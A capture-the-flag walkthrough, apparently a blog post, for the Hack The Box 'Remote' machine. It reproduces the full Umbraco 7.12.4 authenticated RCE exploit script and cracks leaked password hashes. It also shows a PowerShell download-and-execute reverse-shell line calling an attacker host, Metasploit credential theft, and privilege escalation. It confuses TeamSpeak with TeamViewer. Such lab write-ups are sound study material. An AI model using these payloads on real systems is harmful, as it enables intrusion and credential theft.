Remote | Sabitech

Enumeration

Defining a helper variable containing the IP will make the following commands easier:

export ip=10.10.10.180

Ping and Nmap can be used to establish the TTL which will indicate the potential operating system, and find any open ports running on the server

ping $ip
# TTL 127 - Windows
nmap -sC -sV -p- -Pn $ip

port	Service	Version	Notes
22	ftp	MS FTP	Anon allowed
80	http	MS HTTPAPI	Acme Widgets
111	rpcbind?
135	msrpc	MS Windows RPC
445	ms-ds	netbios-ssn
2049	nfs	2-4 (RPC #100003)
5985	http	ms HTTPAPI
…

HTTP

dirsearch -e php,html -f -u http://$ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

This finds an interesting application running at http://10.10.10.180/umbraco which has a login portal with reset password function.

FTP

Checking the ftp service as user anonymous shows there are no files of interest on the server.

ftp $ip
# anonymous / nopass
ls
# shows no files

NFS

Checking for mounts on the nfs shows there is one

showmount -e $ip   
# Export list for 10.10.10.180:
# /site_backups (everyone)

To explore this further we can mount this to our local system:

sudo mount -t nfs $ip:/site_backups /mnt

Checking through the Logs folder we can find a user email which has been logged into before: admin@htb.local

Password Retrieval

In the App_Data folder there is the database file Umbraco.sdf. This file contains passwords which can be checked for by using less and searching for our known login email. These password hashes all contain the string hashAlgotithm. The following command retrieves all the hashes stored ion the database:

strings Umbraco.sdf | grep hash

Retrieved Password Hashes

1
2
3
4
5
6


Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32

These commands crack the password for the admin account:

echo "b8be16afba8c314ad33d812f22a04991b90e2aaa" >> hash
john --format=Raw-SHA1 hashes --wordlist=/usr/share/wordlists/rockyou.txt
# baconandcheese

Exploitation

The portal can now be logged into with the credentials recovered, admin@htb.local and baconandcheese. On the help page the umbraco version is listed as 7.12.4 Doing a search on this version reveals an RCE exploit by sending an RCE payload to /umbraco/backoffice/UmbracoApi/Authentication/PostLogin. There are many examples of sample code for this exploit to perform commands on the server and print the output.

# Search for exploits
searchsploit umbraco
# Check exploit sample
searchsploit -x aspx/webapps/49488.py
# Get exploit sample
searchsploit -m aspx/webapps/49488.py
# Execute it
python 49488.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c ipconfig
# works!

Exploit 49488.py

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68


# Exploit Title: Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)
# Date: 2020-03-28
# Exploit Author: Alexandre ZANNI (noraj)
# Based on: https://www.exploit-db.com/exploits/46153
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# Example: python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig

import requests
import re
import argparse

from bs4 import BeautifulSoup

parser = argparse.ArgumentParser(prog='exploit.py',
    description='Umbraco authenticated RCE',
    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=80))
parser.add_argument('-u', '--user', metavar='USER', type=str,
    required=True, dest='user', help='username / email')
parser.add_argument('-p', '--password', metavar='PASS', type=str,
    required=True, dest='password', help='password')
parser.add_argument('-i', '--host', metavar='URL', type=str, required=True,
    dest='url', help='root URL')
parser.add_argument('-c', '--command', metavar='CMD', type=str, required=True,
    dest='command', help='command')
parser.add_argument('-a', '--arguments', metavar='ARGS', type=str, required=False,
    dest='arguments', help='arguments', default='')
args = parser.parse_args()

# Payload
payload = """\
<?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace"><msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "%s"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "%s"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true;  proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; }  </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> </xsl:template> </xsl:stylesheet>\
""" % (args.arguments, args.command)

login = args.user
password = args.password
host = args.url

# Process Login
url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"
loginfo = { "username": login, "password": password}
s = requests.session()
r2 = s.post(url_login,json=loginfo)

# Go to vulnerable web page
url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx"
r3 = s.get(url_xslt)

soup = BeautifulSoup(r3.text, 'html.parser')
VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']
headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN}
data = { "__EVENTTARGET": "", "__EVENTARGUMENT": "", "__VIEWSTATE": VIEWSTATE,
    "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR,
    "ctl00$body$xsltSelection": payload,
    "ctl00$body$contentPicker$ContentIdValue": "",
    "ctl00$body$visualizeDo": "Visualize+XSLT" }

# Launch the attack
r4 = s.post(url_xslt, data=data, headers=headers)
# Filter output
soup = BeautifulSoup(r4.text, 'html.parser')
CMDOUTPUT = soup.find(id="result").getText()
print(CMDOUTPUT)                                 

This payload checks the running services on the host:

python 49488.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell -a "tasklist /svc"

Of note teamspeak 7 is running which contains an exploit that allows password extraction.

Remote Shell

msfconsole
use exploit/multi/script/web_delivery 
info
set target 2 # powershell
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.14.8
run
# powershell.exe -nop -w hidden -c IEX ((new-object Net.WebClient).DownloadString('http://10.10.14.8:8080/PhF6C0TqpP3emLl/M8r6ApMYJKX'));IEX ((new-object Net.WebClient).DownloadString('http://10.10.14.8:8080/PhF6C0TqpP3emLl/ndQCOjnFIYVA/1'));IEX ((new-object Net.WebClient).DownloadString('http://10.10.14.8:8080/PhF6C0TqpP3emLl'));

Running in second shell to send the exploit:

python 49488.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell -a "-nop -w hidden -c IEX ((new-object Net.WebClient).DownloadString('http://10.10.14.8:8080/PhF6C0TqpP3emLl/M8r6ApMYJKX'));IEX ((new-object Net.WebClient).DownloadString('http://10.10.14.8:8080/PhF6C0TqpP3emLl/ndQCOjnFIYVA/1'));IEX ((new-object Net.WebClient).DownloadString('http://10.10.14.8:8080/PhF6C0TqpP3emLl'));"
# Connection established (in 1st shell)!

Teamspeak passwords

The running teamspeak service, v7, is vulnerable to having any stored credentials recovered. Metasploit has a module that can be used to retrieve any password:

use windows/gather/credentials/teamviewer_passwords
sessions # note session number
set session 3 # from previous
run
# !R3m0te!

Vertical Privilege Escalation via printspool

This command escalates the privledges above the low-level user the shell has been intiated as

getsystem
# ...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).

Vertical Privilege Escalation via Smb

With samba running the teamspeak password may log in through using samba. The metasploit psexec module can be used to test this method:

use exploit/windows/smb/psexec
set rhosts 10.10.10.180
set SMBUser administrator
set SMBPass !R3m0te!
set LHOST tun0
run
shell
whoami
# admin shell!

Flags

cat c:/users/Public/user.txt
cd c:/users/Administrator/Desktop
cat root.txt